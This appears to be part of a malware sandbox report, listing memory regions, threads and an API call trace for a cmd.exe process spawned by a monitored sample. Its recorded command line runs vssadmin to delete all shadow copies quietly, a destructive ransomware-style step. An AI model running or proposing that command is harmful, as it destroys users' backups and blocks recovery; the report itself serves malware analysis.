	              id = 850
	        start_va = 0x154d67d0000
	          end_va = 0x154d6b06fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 851
	        start_va = 0x154d4d60000
	          end_va = 0x154d4d80fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 852
	        start_va = 0x154d4f50000
	          end_va = 0x154d4fa9fff
	       monitored = 1
	     entry_point = 0x154d4f653f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 853
	        start_va = 0x154d5030000
	          end_va = 0x154d503ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d5030000"
	        filename = ""

Region:
	              id = 891
	        start_va = 0x154d6b10000
	          end_va = 0x154d6d28fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d6b10000"
	        filename = ""

Region:
	              id = 921
	        start_va = 0x154d6d30000
	          end_va = 0x154d6f42fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d6d30000"
	        filename = ""

Region:
	              id = 922
	        start_va = 0x154d6f50000
	          end_va = 0x154d7058fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d6f50000"
	        filename = ""

Region:
	              id = 923
	        start_va = 0x154d7060000
	          end_va = 0x154d7272fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d7060000"
	        filename = ""

Region:
	              id = 943
	        start_va = 0x154d7280000
	          end_va = 0x154d7391fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d7280000"
	        filename = ""

Region:
	              id = 1025
	        start_va = 0x41799a0000
	          end_va = 0x41799dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000041799a0000"
	        filename = ""

Region:
	              id = 1026
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 1027
	        start_va = 0x154d4d40000
	          end_va = 0x154d4d40fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000154d4d40000"
	        filename = ""

Region:
	              id = 1028
	        start_va = 0x154d4d50000
	          end_va = 0x154d4d5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d4d50000"
	        filename = ""

Region:
	              id = 1029
	        start_va = 0x154d4f50000
	          end_va = 0x154d500bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000154d4f50000"
	        filename = ""

Region:
	              id = 1030
	        start_va = 0x154d4d40000
	          end_va = 0x154d4d43fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000154d4d40000"
	        filename = ""

Region:
	              id = 1031
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 1054
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 1055
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 1097
	        start_va = 0x154d4d60000
	          end_va = 0x154d4d66fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000154d4d60000"
	        filename = ""

Region:
	              id = 1098
	        start_va = 0x154d4d70000
	          end_va = 0x154d4d70fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000154d4d70000"
	        filename = ""

Region:
	              id = 1099
	        start_va = 0x154d4d80000
	          end_va = 0x154d4d80fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000154d4d80000"
	        filename = ""

Region:
	              id = 1100
	        start_va = 0x154d5010000
	          end_va = 0x154d5014fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 1101
	        start_va = 0x154d5020000
	          end_va = 0x154d5020fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 1115
	        start_va = 0x154d5040000
	          end_va = 0x154d5041fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000154d5040000"
	        filename = ""

Region:
	              id = 1116
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 1130
	        start_va = 0x154d5050000
	          end_va = 0x154d5050fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 1131
	        start_va = 0x154d5060000
	          end_va = 0x154d5061fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000154d5060000"
	        filename = ""


Thread:
	id = 22
	os_tid = 0xdc0


Thread:
	id = 23
	os_tid = 0xde4


Thread:
	id = 30
	os_tid = 0xe30


Thread:
	id = 46
	os_tid = 0xed4


Process:
	id = "8"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x34279000"
	os_pid = "0xdcc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=Y: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 620
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 621
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 622
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 623
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 624
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 625
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 626
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 627
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 628
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 629
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 630
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 631
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 632
	        start_va = 0x7f810000
	          end_va = 0x7f832fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f810000"
	        filename = ""

Region:
	              id = 633
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 634
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 635
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 636
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 637
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 657
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 658
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 666
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 667
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 668
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 669
	        start_va = 0x4600000
	          end_va = 0x474ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 676
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 677
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 678
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 679
	        start_va = 0x7f710000
	          end_va = 0x7f80ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f710000"
	        filename = ""

Region:
	              id = 1217
	        start_va = 0x200000
	          end_va = 0x2bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1218
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1219
	        start_va = 0x4350000
	          end_va = 0x438ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 1220
	        start_va = 0x4750000
	          end_va = 0x484ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004750000"
	        filename = ""

Region:
	              id = 1221
	        start_va = 0x4850000
	          end_va = 0x4a2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004850000"
	        filename = ""

Region:
	              id = 1245
	        start_va = 0x4390000
	          end_va = 0x4393fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004390000"
	        filename = ""

Region:
	              id = 1481
	        start_va = 0x43a0000
	          end_va = 0x43a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000043a0000"
	        filename = ""

Region:
	              id = 1581
	        start_va = 0x4a30000
	          end_va = 0x4d66fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 24
	os_tid = 0xdd0

	[0236.400] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0236.400] GetProcessHeap () returned 0x4650000
	[0236.400] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0x400a) returned 0x465b998
	[0236.400] GetProcessHeap () returned 0x4650000
	[0236.401] RtlFreeHeap (HeapHandle=0x4650000, Flags=0x0, BaseAddress=0x465b998) returned 1
	[0236.403] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0236.403] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0236.403] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0236.403] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0236.403] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0236.403] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0236.403] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0236.404] GetProcessHeap () returned 0x4650000
	[0236.404] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0x58) returned 0x46574f8
	[0236.404] GetProcessHeap () returned 0x4650000
	[0236.404] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0x1a) returned 0x4659048
	[0236.406] GetProcessHeap () returned 0x4650000
	[0236.406] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0x52) returned 0x4659070
	[0236.408] GetConsoleTitleW (in: lpConsoleTitle=0x18f800, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0236.877] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0236.878] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0236.879] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0236.879] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0236.879] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0236.879] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0236.879] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0236.879] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0236.879] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0236.879] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0236.879] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0236.879] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0236.879] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0236.879] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0236.879] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0236.879] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0236.880] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0236.881] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0236.882] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0236.882] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0236.882] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0236.882] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0236.882] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0236.882] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0236.882] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0236.882] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0236.882] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0236.882] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0236.882] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0236.882] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0236.882] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0236.883] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0236.883] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0236.883] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0236.883] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0236.883] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0236.883] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0236.883] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0236.883] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0236.883] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0236.883] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0236.883] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0236.883] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0236.883] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0236.884] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0236.885] GetProcessHeap () returned 0x4650000
	[0236.885] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0x210) returned 0x46590d0
	[0236.885] GetProcessHeap () returned 0x4650000
	[0236.885] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0x64) returned 0x46592e8
	[0236.885] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0236.886] GetProcessHeap () returned 0x4650000
	[0236.886] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0x418) returned 0x46505c8
	[0236.886] SetErrorMode (uMode=0x0) returned 0x0
	[0236.886] SetErrorMode (uMode=0x1) returned 0x0
	[0236.886] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46505d0, lpFilePart=0x18f30c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f30c*="Desktop") returned 0x1d
	[0236.887] SetErrorMode (uMode=0x0) returned 0x1
	[0236.887] GetProcessHeap () returned 0x4650000
	[0236.887] RtlReAllocateHeap (Heap=0x4650000, Flags=0x0, Ptr=0x46505c8, Size=0x56) returned 0x46505c8
	[0236.887] GetProcessHeap () returned 0x4650000
	[0236.887] RtlSizeHeap (HeapHandle=0x4650000, Flags=0x0, MemoryPointer=0x46505c8) returned 0x56
	[0236.887] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0236.888] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0236.888] GetProcessHeap () returned 0x4650000
	[0236.888] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0x182) returned 0x4659358
	[0236.888] GetProcessHeap () returned 0x4650000
	[0236.888] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0x2fc) returned 0x4650628
	[0237.290] GetProcessHeap () returned 0x4650000
	[0237.290] RtlReAllocateHeap (Heap=0x4650000, Flags=0x0, Ptr=0x4650628, Size=0x184) returned 0x4650628
	[0237.290] GetProcessHeap () returned 0x4650000
	[0237.290] RtlSizeHeap (HeapHandle=0x4650000, Flags=0x0, MemoryPointer=0x4650628) returned 0x184
	[0237.290] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0237.291] GetProcessHeap () returned 0x4650000
	[0237.291] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x8, Size=0xe0) returned 0x46594e8
	[0237.296] GetProcessHeap () returned 0x4650000
	[0237.296] RtlReAllocateHeap (Heap=0x4650000, Flags=0x0, Ptr=0x46594e8, Size=0x76) returned 0x46594e8
	[0237.296] GetProcessHeap () returned 0x4650000
	[0237.296] RtlSizeHeap (HeapHandle=0x4650000, Flags=0x0, MemoryPointer=0x46594e8) returned 0x76
	[0237.297] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0237.297] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f098) returned 0xffffffff
	[0237.298] GetLastError () returned 0x2
	[0237.298] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0237.298] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f098) returned 0xffffffff
	[0237.299] GetLastError () returned 0x2
	[0237.299] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0237.299] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f098) returned 0x4659568
	[0237.299] GetProcessHeap () returned 0x4650000
	[0237.299] RtlAllocateHeap (HeapHandle=0x4650000, Flags=0x0, Size=0x14) returned 0x46578b0
	[0237.299] FindClose (in: hFindFile=0x4659568 | out: hFindFile=0x4659568) returned 1
	[0237.300] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f098) returned 0xffffffff
	[0237.300] GetLastError () returned 0x2
